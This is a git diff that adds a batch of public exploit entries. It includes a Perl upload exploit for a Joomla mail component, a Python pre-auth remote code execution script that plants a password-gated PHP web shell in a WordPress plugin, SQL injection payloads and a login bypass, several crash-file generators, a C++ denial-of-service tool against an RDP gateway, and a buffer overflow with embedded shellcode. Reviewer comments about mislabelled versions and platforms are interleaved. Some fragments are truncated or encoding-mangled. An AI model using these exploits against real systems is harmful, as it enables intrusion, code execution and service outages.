is_valid_url +{ + my $given_url = shift(@_); + + return 1 if ( $given_url =~ /^http(s)?:\/\// ); + return 0; +} + +sub do_die +{ + my $errmsg = shift(@_); + + printf("[!] %s\n", $errmsg); + exit(); +} + +sub get_base_path +{ + return(sprintf("%s/index.php", $_[0])); +} + +sub do_exploit +{ + my %params = %{ shift(@_); }; + my $ua = LWP::UserAgent->new( + "agent" => $params{"useragent"}, + "timeout" => 360 + ); + + print("[+] Trying to exploit ...\n"); + print("[*] Sending POST request ...\n"); + my $response = $ua->post( + get_base_path($params{"url"}), + "Content-Type" => "form-data", + "Accept-Language" => "zh-cn", + "Content" => { + "option" => "com_acym", + "ctrl" => "frontmails", + "task" => "setNewIconShare", + "social" => $params{"path"}, + "file" => [ $params{"file"} ], + }, + ); + + if ( $response->code == 200 ) + { + my $j = decode_json($response->decoded_content); + my $f = sprintf("%s.%s", + $j->{"url"}, $j->{"extension"}); + my $response = $ua->head($f); + + printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 ); + } +} + +sub main +{ + print_usage_and_exit() if ( scalar(@ARGV) < 2 ); + + my %params = ( + "url" => $ARGV[0], + "path" => $ARGV[1], + "file" => $ARGV[2], + "useragent" => fetch_useragent()); + + do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) ); + do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0); + printf("[*] Parameters:\n"); + + while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); } + printf("*" x50 . "\n"); + + while ( 1 ) + { + printf("[?] Proceed(y/n)> "); + + my $c = ; + chomp($c); + + if ( (length($c) == 1) and lc($c) eq "y" ) + { + do_exploit(\%params); + last; + } + } +} + +main(); +######################################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/48238.txt b/exploits/php/webapps/48238.txt new file mode 100644 index 000000000..d42cf6122 --- /dev/null 
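Review bot: The title of `48230.txt` gives the affected version as "ACYMAILING 3.9.0", but the header lists `# Version: v6.9.1 Starter` and `# Tested on: Joomla! v3.9.0`, so the title appears to carry the Joomla! core version rather than the component version. `48349.py` later in this patch has the same pattern: its title says "Simple File List 5.4" while its header says `# Version: Wordpress v5.4 Simple File List v4.2.2`, and its `# Date: 2020-04-2019` is not a valid date. Anyone matching these entries against installed component versions will get wrong results, so the titles should presumably name 6.9.1 and 4.2.2 respectively; confirm with the authors before changing.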
+++ b/exploits/php/webapps/48238.txt @@ -0,0 +1,39 @@ +* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload +* Google Dork: N/A +* Date: 2020.03.22 +* Exploit Author: Milad Karimi +* Vendor Homepage: https://github.com/xiebruce/PicUploader +* Software Link: https://github.com/xiebruce/PicUploader +* Category : webapps +* Version: 1.0 +* Tested on: windows 10 , firefox +* CVE : N/A + +Vulnerable Source: +    88: move_uploaded_file move_uploaded_file($tmp_name, $dest)) +    86: foreach($files['tmp_name'] as $key=>$tmp_name) +    80: $files = $_FILES['file']){ +    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), +    87: $dest = $tmpDir . '/' . $files['name'][$key]; +    81: $tmpDir = APP_PATH . '/.tmp'; +    24: define('APP_PATH', strtr(__DIR__, '\\', '/'));  // define() +    80: $files = $_FILES['file']){ +    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), +    80: if(isset($_FILES['file']) && $files = $_FILES['file']) +    84: if(is_array($files['tmp_name'])) + +Exploit: +"@$shahab")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> + +Location File: +http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg \ No newline at end of file diff --git a/exploits/php/webapps/48278.txt b/exploits/php/webapps/48278.txt new file mode 100644 index 000000000..a14e27435 --- /dev/null +++ b/exploits/php/webapps/48278.txt 
@@ -0,0 +1,60 @@ +# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerability +# Google Dork: N/A=20 +# Date: 2020-04-01 +# Exploit Author: Unkn0wn +# Vendor Homepage: https://www.php-fusion.co.uk +# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php +# Version: 9.03.50 +# Tested on: Ubuntu +# CVE : N/A +--------------------------------------------------------- +Code Execution: +This vulnerabilty in "add_panel_form()" function. +in line 527 we can see "eval" tag: +* +eval("?>".stripslashes($_POST['panel_content'])."".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."\n"; +" + +Demo: +http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2= +2e900fb§ion=3Dpanelform&action=3Dedit&panel_id=3D4 + +POST DATA: +fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c= +f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_= +name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti= +on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan= +el_content=3D;""&panel_access=3D0&panel_la= +nguages[]=3DEnglish&panel_save=3DPreview Panel + +---------------------------------------------------------- +# Contact : 0x9a@tuta.io +# Visit: https://t.me/l314XK205E +# @ 2010 - 2020 +# Underground Researcher \ No newline at end of file diff --git a/exploits/php/webapps/48307.txt b/exploits/php/webapps/48307.txt new file mode 100644 index 000000000..63f9ea41b --- /dev/null +++ b/exploits/php/webapps/48307.txt 
@@ -0,0 +1,30 @@ +Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin +Version : 2.4.11 +Software Link : https://wordpress.org/plugins/helpful/ +Date of found: 10.04.2019 +Author: Numan Türle + + +core/Core.class.php +// Ajax requests: pro +add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) ); + +// set args for insert command +$args = array( +'post_id' => $_REQUEST['post_id'], +'user' => $_REQUEST['user'], +'pro' => $_REQUEST['pro'], +'contra' => $_REQUEST['contra'] +); +$result = $this->insert( $args ); + +@params = 'post_id' => $_REQUEST['post_id'], +call function insert --> + +if( !$args['post_id'] ) return false; +$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id"); + + + +Payload : +GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1 \ No newline at end of file diff --git a/exploits/php/webapps/48347.txt b/exploits/php/webapps/48347.txt new file mode 100644 index 000000000..b8499915c --- /dev/null +++ b/exploits/php/webapps/48347.txt @@ -0,0 +1,121 @@ + + + + + + + + +
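Review bot: The write-up for `48307.txt` quotes the vulnerable query but records neither a fixed plugin version nor the remediation, so a reader cannot tell how far past 2.4.11 the exposure extends. In the quoted `get_results` call both `$user` and `$post_id` come from `$_REQUEST` and are interpolated into the SQL string, `$post_id` without quotes; the entry should state the fix, binding both values, e.g. `$wpdb->prepare("SELECT post_id,user FROM $table_name WHERE user = %s AND post_id = %d", $user, $post_id)`. It should also say whether authentication is required: only the `wp_ajax_helpful_ajax_pro` hook is shown, which WordPress fires for logged-in users, and no `wp_ajax_nopriv_` registration is quoted.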

This is totally a legit page. Just keep reading this for a minute :)

+ + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48349.py b/exploits/php/webapps/48349.py new file mode 100755 index 000000000..97aa87f96 --- /dev/null +++ b/exploits/php/webapps/48349.py @@ -0,0 +1,95 @@ +# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution +# Date: 2020-04-2019 +# Exploit Author: coiffeur +# Vendor Homepage: https://simplefilelist.com/ +# Software Link: https://wordpress.org/plugins/simple-file-list/ +# Version: Wordpress v5.4 Simple File List v4.2.2 + +import requests +import random +import hashlib +import sys +import os +import urllib3 +urllib3.disable_warnings() + +dir_path = '/wp-content/uploads/simple-file-list/' +upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php' +move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php' + + +def usage(): + banner = """ +NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE +SYNOPSIS: python wp_simple_file_list_4.2.2.py +AUTHOR: coiffeur + """ + print(banner) + + +def generate(): + filename = f'{random.randint(0, 10000)}.png' + password = hashlib.md5(bytearray(random.getrandbits(8) + for _ in range(20))).hexdigest() + with open(f'{filename}', 'wb') as f: + payload = '404 Not Found

Not Found

";}?>' + f.write(payload.encode()) + print(f'[ ] File {filename} generated with password: {password}') + return filename, password + + +def upload(url, filename): + files = {'file': (filename, open(filename, 'rb'), 'image/png')} + datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, + 'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'} + r = requests.post(url=f'{url}{upload_path}', + data=datas, files=files, verify=False) + r = requests.get(url=f'{url}{dir_path}{filename}', verify=False) + if r.status_code == 200: + print(f'[ ] File uploaded at {url}{dir_path}{filename}') + os.remove(filename) + else: + print(f'[*] Failed to upload {filename}') + exit(-1) + return filename + + +def move(url, filename): + new_filename = f'{filename.split(".")[0]}.php' + headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1', + 'X-Requested-With': 'XMLHttpRequest'} + datas = {'eeSFL_ID': 1, 'eeFileOld': filename, + 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'} + r = requests.post(url=f'{url}{move_path}', + data=datas, headers=headers, verify=False) + if r.status_code == 200: + print(f'[ ] File moved to {url}{dir_path}{new_filename}') + else: + print(f'[*] Failed to move {filename}') + exit(-1) + return new_filename + + +def main(url): + file_to_upload, password = generate() + uploaded_file = upload(url, file_to_upload) + moved_file = move(url, uploaded_file) + if moved_file: + print(f'[+] Exploit seem to work.\n[*] Confirmning ...') + + datas = {'password': password, 'cmd': 'phpinfo();'} + r = requests.post(url=f'{url}{dir_path}{moved_file}', + data=datas, verify=False) + if r.status_code == 200 and r.text.find('php') != -1: + print('[+] Exploit work !') + print(f'\tURL: {url}{dir_path}{moved_file}') + print(f'\tPassword: {password}') + + +if __name__ == "__main__": + if (len(sys.argv) < 2): + usage() + exit(-1) + + main(sys.argv[1]) \ No newline at end of file 
diff --git a/exploits/php/webapps/48374.txt b/exploits/php/webapps/48374.txt
new file mode 100644
index 000000000..844163df5
--- /dev/null
+++ b/exploits/php/webapps/48374.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation
+# Date: 2020-04-22
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://kaasoft.pro/
+# Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281
+# Product Version: v2.2.0
+# Product : Library CMS
+# Vulernability Type : Broken Authentication
+# Vulenrability : Session Fixation
+# CVE : N/A
+
+# Description :
+
+Session Fixation vulnerability has been discovered in v2.2.0
+version of Library CMS Powerful Book Management System.
+
+Admin HTTP Request :
+
+POST /admin/login HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://XXX.XXX.XXX.XXX/admin/login
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 49
+Connection: close
+Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
+Upgrade-Insecure-Requests: 1
+
+login=USERNAME&password=PASSWORD
+
+Member HTTP Request :
+
+POST /admin/login HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://XXX.XXX.XXX.XXX/admin/login
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Connection: close
+Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
+Upgrade-Insecure-Requests: 1
+
+login=USERNAME&password=PASSWORD
\ No newline at end of file
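Review bot: The two captured requests in `48374.txt` do not by themselves demonstrate session fixation: both are login POSTs to `/admin/login` carrying the same `PHPSESSID`, and no server response is shown. The finding rests on the session identifier not being reissued after authentication, so the entry should include the login response's `Set-Cookie` header (or note its absence) and name the remediation, regenerating the session ID at login, e.g. `session_regenerate_id(true)` in PHP. The "Member HTTP Request" is also addressed to `/admin/login` with an admin-login `Referer`, which looks like a copy of the admin capture; worth confirming with the author.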
diff --git a/exploits/php/webapps/48605.txt b/exploits/php/webapps/48605.txt
new file mode 100644
index 000000000..8236a21d3
--- /dev/null
+++ b/exploits/php/webapps/48605.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Exploit Author: Prof. Kailas PATIL (krp)
+# Date: 2020-06-18
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
+# Version: v1.0
+# Category: Webapps
+# Tested on: LAMP for Linux
+
+# Description:
+# Password and username parameters have sql injection vulnerability in Admin login panel.
+#
+#------------------------------------------------------
+#
+# Login Link: http://localhost/bpms/admin/index.php
+# username: ' or '1'='1'#
+# password: blah123
+#
+#------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/watchos/dos/47404.pl b/exploits/watchos/dos/47404.pl
new file mode 100755
index 000000000..414d4f295
--- /dev/null
+++ b/exploits/watchos/dos/47404.pl
@@ -0,0 +1,27 @@
+# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS)
+# Exploit Author: Emilio Revelo
+# Date: 2019-09-20
+# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
+# Tested on: Windows 10 Pro x64 es
+
+# Steps to produce the DoS:
+
+# 1.- Run perl script : perl SpotIE.pl
+# 2.- Open SpotIE.txt and copy the content to clipboard
+# 3.- Open SpotIE Internet Explorer Password Recovery
+# 4.- Navigate to Register -> Enter the registration name and key below...
+# 5.- Paste ClipBoard on "Key:"
+# 7.- OK
+# 8.- Crashed!!
+
+#!/usr/local/bin/perl
+
+use strict;
+use warnings;
+
+my $filename = 'SpotIE.txt';
+open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
+print $fh "E"x256;
+close $fh;
+print "Done!\n";
+print "File: SpotIE.txt\n"
\ No newline at end of file
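Review bot: `exploits/watchos/dos/47404.pl` is filed under the watchOS platform, but its header says `# Tested on: Windows 10 Pro x64 es` and the software link is a Windows installer (`spotie_setup.exe`). The next section, `exploits/watchos/dos/47406.py`, has the same mismatch (`# Tested on: Windows 10 x64`). Anyone filtering the archive by platform, for example to match entries against an asset inventory, will miss both under Windows and get false hits under watchOS; the paths should presumably be under `exploits/windows/dos/`. The step list in 47404.pl also jumps from 5 to 7.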
diff --git a/exploits/watchos/dos/47406.py b/exploits/watchos/dos/47406.py
new file mode 100755
index 000000000..acb514837
--- /dev/null
+++ b/exploits/watchos/dos/47406.py
@@ -0,0 +1,30 @@
+# Exploit Title: InputMapper < 1.6.10 Local Denial of Service
+# Date: 20.09.2019
+# Vendor Homepage: https://inputmapper.com/
+# Software Link: https://inputmapper.com/downloads/category/2-input-mapper
+# Exploit Author: elkoyote07
+# Tested Version: 1.6.10
+# Tested on: Windows 10 x64
+
+
+# 1.- Start Input Mapper
+# 2.- Click on Guest (Top left)
+# 3.- Click on Login
+# 3.- Copy the content of exploit.txt in the Username field
+# 4.- Once copied double-click on Username field
+# 5.- Happy crash :)
+
+
+
+
+#!/usr/bin/python
+
+t = "A" * 15000
+
+try:
+f=open("exploit.txt","w")
+f.write(t)
+f.close()
+print "Done"
+except:
+print "Error"
\ No newline at end of file
diff --git a/exploits/windows/dos/47393.txt b/exploits/windows/dos/47393.txt
new file mode 100644
index 000000000..1295bbcf5
--- /dev/null
+++ b/exploits/windows/dos/47393.txt
@@ -0,0 +1,35 @@ +# Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file. +# Google Dork: N/A +# Date: 2019-09-14 +# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) +# Vendor Homepage: https://notepad-plus-plus.org/ +# Version: < 7.7 +# Tested on: Windows x64 +# CVE : CVE-2019-16294 + +# Description: + +SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. + +Open aaaaa.ml via affected notepad++ + +POC files: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47393.zip + +Result: + +(230.c64): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll - +rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa +rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff +rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81 +r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9 +r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000 +r14=0000000000000001 r15=0000000000000002 +iopl=0 nv up ei pl zr na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +SciLexer!Scintilla_DirectFunction+0x950dd: +00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=???? \ No newline at end of file diff --git a/exploits/windows/dos/47795.py b/exploits/windows/dos/47795.py new file mode 100755 index 000000000..e8d5f1363 --- /dev/null +++ b/exploits/windows/dos/47795.py 
@@ -0,0 +1,26 @@ +# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) +# Date: 2019-12-18 +# Exploit Author: Chris Inzinga +# Vendor Homepage: http://www.bimesoft.com/ +# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml +# Version: 2.2.0.103 +# Tested on: Windows 7 SP1 (x86) + +# Steps to reproduce: +# 1. Generate a malicious payload via the PoC +# 2. In the application set the 'Start Page URL' to any value, it doesn't matter. +# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'. +# 4. Observe a program DOS crash, overwriting SEH=20 + +#!/usr/bin/python + +payload =3D "A" * 382 + "B" * 4 + "C" * 4 + +try: + fileCreate =3Dopen("exploit.txt","w") + print("[x] Creating file") + fileCreate.write(payload) + fileCreate.close() + print("[x] File created") +except: + print("[!] File failed to be created") \ No newline at end of file diff --git a/exploits/windows/dos/47801.py b/exploits/windows/dos/47801.py new file mode 100755 index 000000000..71c416ffa --- /dev/null +++ b/exploits/windows/dos/47801.py @@ -0,0 +1,21 @@ +# Exploit Title: XnConvert 1.82 - Denial of Service (PoC) +# Date: 2019-12-21 +# Vendor Homepage: https://www.xnview.com +# Software Link: https://www.xnview.com/en/apps/ +# Exploit Author: Gokkulraj (TwinTech Solutions) +# Tested Version: v1.82 +# Tested on: Windows 7 x64 + +# 1.- Download and install XnConvert +# 2.- Run python code : XnConvert.py +# 3.- Open EVIL.txt and copy content to clipboard +# 4.- Open XnConvert and Click 'EnterKey' +# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' +# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash. + +#!/usr/bin/env python +Dos= "\x41" * 9000 +myfile=open('Evil.txt','w') +myfile.writelines(Dos) +myfile.close() +print("File created") \ No newline at end of file 
diff --git a/exploits/windows/dos/47849.py b/exploits/windows/dos/47849.py
new file mode 100755
index 000000000..f55905f03
--- /dev/null
+++ b/exploits/windows/dos/47849.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotFTP
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.SpotFTP Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47872.py b/exploits/windows/dos/47872.py
new file mode 100755
index 000000000..fd5ded707
--- /dev/null
+++ b/exploits/windows/dos/47872.py
@@ -0,0 +1,33 @@
+# Exploit Title: SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
+# Exploit Author : Ismail Tasdelen
+# Exploit Date: 2020-01-06
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotDialup
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.SpotDialup Crashed
+'''
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("poc.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/windows/dos/47963.cpp b/exploits/windows/dos/47963.cpp
new file mode 100644
index 000000000..d4f80d734
--- /dev/null
+++ b/exploits/windows/dos/47963.cpp
@@ -0,0 +1,135 @@ +#include "BlueGate.h" + +/* +EDB Note: +- Download (Source) ~ +- Download (Binary) ~ +*/ + + +void error(const char* msg) +{ + printf("ERROR: %s\n", msg); + exit(EXIT_FAILURE); +} + +void SOCKInit() +{ + WSADATA wsaData; + int res; + + res = WSAStartup(MAKEWORD(2, 2), &wsaData); + + if (res != 0) + error("WSAStartup failed"); +} + +void DTLSInit() +{ + SSL_library_init(); + SSL_load_error_strings(); + ERR_load_BIO_strings(); + OpenSSL_add_all_algorithms(); +} + +int OpenUDPConnection(const char* hostname, int port) +{ + int sockfd; + sockaddr_in addr; + + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + if (sockfd < 0) + error("Failed to open socket"); + + addr.sin_family = AF_INET; + addr.sin_port = htons(port); + + inet_pton(AF_INET, hostname, &(addr.sin_addr)); + + if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0) + { + closesocket(sockfd); + error("Failed to connect socket"); + } + + return sockfd; +} + +SSL* DTLSConnection(const char* hostname) +{ + int sockfd; + int result; + DTLSParams client; + + sockfd = OpenUDPConnection(hostname, 3391); + + client.ctx = SSL_CTX_new(DTLS_client_method()); + client.bio = BIO_new_ssl_connect(client.ctx); + + BIO_set_conn_hostname(client.bio, hostname); + BIO_get_ssl(client.bio, &(client.ssl)); + + SSL_set_connect_state(client.ssl); + SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY); + + SSL_set_fd(client.ssl, sockfd); + + if (SSL_connect(client.ssl) != 1) { + return NULL; + } + + return client.ssl; +} + +int send_dos_packet(SSL* ssl, int id) { + CONNECT_PKT_FRAGMENT packet; + + packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT; + packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER); + packet.usFragmentID = id; + packet.usNoOfFragments = id; + packet.cbFragmentLength = 1000; + memset(packet.fragment, 0x41, 1000); + + char pkt[sizeof(packet)]; + memcpy(&pkt, &packet, sizeof(packet)); + + return SSL_write(ssl, pkt, sizeof(pkt)); +} + +int main(int argc, char* argv[]) +{ + + 
SSL* ssl; + int i = 0; + char* hostname; + + if (argc != 2) { + printf("Usage: %s \n", argv[0]); + return 0; + } + + hostname = argv[1]; + + SOCKInit(); + DTLSInit(); + + while (i++ > -1) { + ssl = DTLSConnection(hostname); + + if (ssl == NULL) { + break; + } + + for (int n = 0; n < 4; n++) { + send_dos_packet(ssl, i+n); + printf("Sending packet [%u]\n", i + n); + } + + i++; + } + + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/47411.py b/exploits/windows/local/47411.py new file mode 100755 index 000000000..e50c58800 --- /dev/null +++ b/exploits/windows/local/47411.py 
@@ -0,0 +1,87 @@ +#!/usr/bin/python + +# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow +# Date: 9/23/2019 +# Exploit Author: x00pwn +# Vendor Homepage: http://www.sharing-file.com/ +# Software Link: http://www.sharing-file.com/efssetup.exe +# Version: 7.2 +# Tested on: Windows 7 + +# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow +# by creating a malicious username, this exploit POC will create a malicious text file +# with the contents to execute arbitrary code. +# Author : Nu11pwn + +badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" +"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" +"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" +"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" +"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" +"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") + +# found bad chars - "\x00\x0a\x0d" + +shellcode = "" +shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e" +shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e" +shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35" +shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80" +shellcode += 
"\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89" +shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39" +shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba" +shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88" +shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8" +shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3" +shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46" +shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed" +shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a" +shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1" +shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0" +shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6" +shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a" +shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff" +shellcode += "\xed\xe7\xf7\xff" + +# Log data, item 69 +# Address=0BADF00D +# Message= 0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) + +# Log data, item 24 +# Address=100195F2 +# Message= 0x100195f2 : pop esi # pop ecx # ret | {PAGE_EXECUTE_READ} [ImageLoad.dll] 